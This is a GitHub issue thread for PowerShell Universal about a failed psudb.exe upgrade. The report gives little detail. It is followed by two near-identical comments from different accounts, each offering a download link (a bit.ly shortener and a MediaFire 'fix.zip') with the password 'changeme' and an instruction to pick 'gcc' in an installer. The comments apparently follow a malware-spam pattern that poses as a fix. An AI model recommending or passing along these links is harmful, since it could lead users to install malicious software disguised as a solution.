### ISSUE TITLE
psudb.exe Upgrade Issue

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3663]
### Version

5.0.1

### Severity

Low

### Environment

msi

### Steps to Reproduce

![image](https://github.com/user-attachments/assets/f60521fd-706b-44f8-b326-8d0077abdda7)

### Expected behavior

```console
Upgrades successfully
```

### Actual behavior

```console
Error
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
